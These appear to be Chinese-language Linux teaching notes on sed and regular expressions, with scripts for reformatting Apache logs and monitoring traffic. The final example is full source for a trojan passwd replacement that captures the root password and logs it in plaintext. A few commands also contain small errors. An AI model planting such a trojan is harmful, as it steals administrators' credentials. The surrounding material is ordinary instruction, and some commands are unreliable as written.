sed -options 'command' /etc/passwd
cat /etc/passwd | sed -options 'command'
-i <------------------------这个参数可以修改原文件
删除行
# sed -e 'd' /etc/passwd <-- d 删除行的命令,每处理一行,就执行一次删除行的操作。
# head -5 /etc/passwd | sed -e '1,3d' 删除1到3行
# head -5 /etc/passwd | sed -e '1d;3d'删除第一行和第三行
# head -5 /tmp/test/passwd | sed -e '/root/d' 删除包含root关键字的行
# head -5 /tmp/test/passwd | sed -e '/^root/d' 删除以root开头的行
# head -5 /tmp/test/passwd | sed -e '/nologin$/d'
[root@dns shell_05]# cat /etc/rc.local | sed -e '/^#/d;/^$/d' 删除以#开头或者是空行的行
打印行
# head -5 /tmp/test/passwd |sed -e '1p'
# head -5 /tmp/test/passwd |sed -n -e '1p' 注意对比两个命令的区别
[root@dns shell_05]# head -5 /etc/passwd |sed -n -e '/^root/,/^daemon/p'
root:x:0:0:tanpao,uplooking,124324324,24235454:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
[root@dns shell_05]# cat /tmp/test/passwd | sed -n -e '/^root/,/^daemon/p'
root:x:0:0:tanpao,uplooking,124324324,24235454:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemonroot:x:2:2:daemon:/sbin:/sbin/nologin
rootlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sdfsdgdfgdfgfeg
line2
line3
line4
daemon
替换
# cat /tmp/test/passwd | sed -e '1,5s/daemon/@@@@@/g'
# cat /tmp/test/passwd | sed -e 's/line/@@@@@/g'
# cat /tmp/test/passwd | sed -e '1,$s/line/@@@@@/g'
# cat /tmp/test/passwd | sed -e '/^root/,/^bin/s/x/@/'
替换并且修改源文件:
# sed -i 's/line/@@@@@/g' /tmp/test/passwd 《---不能使用管道
# cat /tmp/test/passwd | sed -e 's/\/sbin\/nologin/\/bin\/false/'
正则表达式
.匹配任意一个字符
*匹配0个或者多个字符
^# 匹配以#开头的
#$ 匹配以#结尾的
[abcd] 匹配a或者b或者c或者d
[^abc] 匹配不包含a或b或c
h{2} 与hh匹配 2代表前面的字符重复2
h{2,3} 与hh或者hhh匹配
h+ 匹配至少一个或多个字符h
h* 匹配0或者多个h
h? 匹配0个或者1个h
[a-z] 匹配小写字符
[A-Z] 匹配大写字母
[a-Z] 匹配所有的字母
[:alnum:] 匹配字母和数字
[:blank:] 匹配空格或这个制表符号
[:digit:] 匹配纯数字
[:lower:] 匹配小写字母
[:upper:] 匹配大写字母
[:punct:] 标点符号
===========================================================================================================================================
域:
例子:
[root@qianxin df]# date +%m-%d-%y | sed -e 's/\(.*\)-\(.*\)-\(.*\)/\3-\1-\2/'
将04-13-10变化为10-04-13
[root@qianxin df]# date +%m-%d-%y | sed -r 's/(.*)-(.*)-(.*)/3-1-2/'
将04-13-10变化为10-04-13
# echo 'come on,baby!' | sed -e 's/\(.*\),\(.*\)!/\2,\1!/'
baby,come on!
使用“域”来定位
# date +%m-%d-%Y | sed -e 's/\(.*\)-\(.*\)-\(.*\)/\3-\1-\2/'
2010-04-13
# date +%m-%d-%Y | sed -r 's/(.*)-(.*)-(.*)/\3-\1-\2/'
2010-04-13
# echo 'come on,baby!' | sed -e 's/\(.*\),\(.*\)!/\2,\1!/'
baby,come on!
域的匹配是“贪婪”模式
[root@dns shell_05]# echo 'come on,baby,now!' | sed -r 's/(.*),(.*)!/\1/'
come on,baby
[root@dns shell_05]# echo 'come on,baby,now!' | sed -r 's/(.*),(.*),(.*)!/\1/'
come on
删除每行的第一个字符
# cat /etc/fstab | sed -e 's/\(.\)\(.*\)/\2/'
删除每行的第二个字符
# cat /etc/fstab | sed -e 's/\(.\)\(.\)\(.*\)/\1\3/'
删除每行的最后一个字符
# cat /etc/fstab | sed -e 's/\(.*\)\(.\)/\1/'
删除每行的倒数第二个字符
# cat /etc/fstab | sed -e 's/\(.*\)\(.\)\(.\)/\1\3/'
删除第二个单词
# cat /etc/fstab | sed -r 's/([a-Z]+)([^a-Z]+)([a-Z]+)([^a-Z]+)(.*)/\1\2\4\5/'
删除倒数第二个单词
# cat /etc/fstab | sed -r 's/(.*)([^a-Z]+)([a-Z]+)([^a-Z]+)([a-Z]+)([^a-Z]*$)/\1\2\4\5\6/'
删除最后一个单词
# cat /etc/fstab | sed -r 's/(.*)([^a-Z]+)([a-Z]+)([^a-Z]*$)/\1\2\4/'
=============================================================================================================================================================
例子1:处理apache的日志文件
处理前:
19070 id.zdanswer.cn 220.166.58.80 - - [10/Sep/2009:12:47:56 +0800] "GET /afsunion/xdpsrp.js HTTP/1.1" 200 1674 "http://www.baidu.com/s?dn=http%3A%2F%2Fwww.baidu.com%2Fs&pc=103&ctype=2&wd=97dn.com&tn=13800_pg" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Sicent)"
处理中:
[10/Sep/2009:12:47:56 220.166.58.80 id.zdanswer.cn /afsunion/xdpsrp.js 200 "http://www.baidu.com/s?dn=http%3A%2F%2Fwww.baidu.com%2Fs&pc=103&ctype=2&wd=97dn.com&tn=13800_pg"
处理后:
2009-09-10 12:47:56 220.166.58.80 id.zdanswer.cn /afsunion/xdpsrp.js 200 http://www.baidu.com/s?dn=http%3A%2F%2Fwww.baidu.com%2Fs&pc=103&ctype=2&wd=97dn.com&tn=13800_pg
执行脚本如下:
#!/bin/bash
a=mktemp
awk '{print ($6,$3,$2,$9,$11,$13)}' httpd.log > $a
sed -r 's/^\[//;s/\/Jan\//-01-/;s/\/Feb\//-02-/;s/\/Mar\//-03-/;s/\/Apr\//-04-/;s/\/May\//-05-/;s/\/Jun\//-06-/;s/\/Jul\//-07-/;s/\/Aug\//-08-/;s/\/Sep\//-09-/;s/\/Oct\//-10-/;s/\/Nov\//-11-/;s/\/Dec\//-12-/;s/:/ /;s/([0-9]+)(-[0-9]+-)([0-9]+)(.*)/\3\2\1\4/;s/"//;s/"//' $a
rm -f $a
------------------------------------------------------------------------------------------------------------------------------------------
其他方法:
#!/bin/bash
cat log.txt |awk '{a=substr($6,2,11);b=substr($6,14);c=substr($13,2,length($13)-2);print a,b,$3,$2,$9,$11,c}' > log1.txt
10/Oct/2009 12:47:10 222.209.211.147 id.zdanswer.cn /afsunion/xdpsrp.js 200 http://www.baidu.com/s?dn=http%3A%2F%2Fwww.baidu.com%2Fs&pc=103&ctype=2&wd=%C9%C1%C1%C1%B5%C4%C8%D5%D7%D3+%C2%DE%B4%F3%D3%D3&tn=13800_pg
cat log1.txt | sed -r 's/(.*)\/(.*)\/(.*) (..):(..):(..) (.*)/\3-\2-\1 \4:\5:\6 \7/;s/Jau/01/;s/Feb/02/;s/Mar/03/;s/Apr/04/;s/May/05/;s/Jun/06/;s/Jul/07/;s/Aug/08/;s/Sep/09/;s/Oct/10/;s/Nov/11/;s/Dec/12/' >log2.txt
10/Sep/2009:12:47:10 222.209.211.147 id.zdanswer.cn /afsunion/xdpsrp.js 200 http://www.baidu.com/s?dn=http%3A%2F%2Fwww.baidu.com%2Fs&pc=103&ctype=2&wd=%C9%C1%C1%C1%B5%C4%C8%D5%D7%D3+%C2%DE%B4%F3%D3%D3&tn=13800_pg
================================================================================================================================================================
例子2:本机流量监控
#!/bin/bash
#例子2:本机流量监控
a=$1
b=$2
c=`cat /proc/net/dev | grep $1 | awk '{print $1}' | awk -F: '{print $2}'`
d=`cat /proc/net/dev | grep $1 | awk '{print $9}'`
while true
do
recive=`cat /proc/net/dev | grep $1 | awk '{print $1}' | awk -F: '{print $2}'`
transmit=`cat /proc/net/dev | grep $1 | awk '{print $9}'`
sleep $2
break
done
let jin=($recive-$c)/$b
let chu=($transmit-$d)/$b
#echo "$c"
#echo "$d"
#echo "$recive"
#echo "$transmit"
echo "平均接收的流量:'$jin'byte"
echo "平均发送的流量:'$chu'byte"
~
=================================================================================================================================================================
例子3:shell病毒--劫持passwd,盗取密码修改信息 (时间允许的话才讲)<--------------------------201004101---passwd.sh---passwd
count=1
if [ -z $1 ];then
echo "Changing password for user root."
while true
read -s -p "New UNIX password:" passwd1
echo
read -s -p "Retype new UNIX password:" passwd2
echo
do
if [ $passwd1 = $passwd2 ] ;then
echo "passwd: all authentication tokens updated successfully."
c=$passwd1
break
elif [ $passwd1 -eq $passwd2 ];then
echo "passwd: all authentication tokens updated successfully."
c=$passwd1
break
else
echo "Sorry, passwords do not match."
if [ $count -eq 3 ];then
sleep 2
echo "passwd: Authentication information cannot be recovered"
break
else
let count++
continue
fi
fi
done
/bin/echo "$c" | /usr/bin/passwd --stdin root &> /dev/null
logger -t "passwd for root:" "$c"
else
/usr/bin/passwd1 $1
fi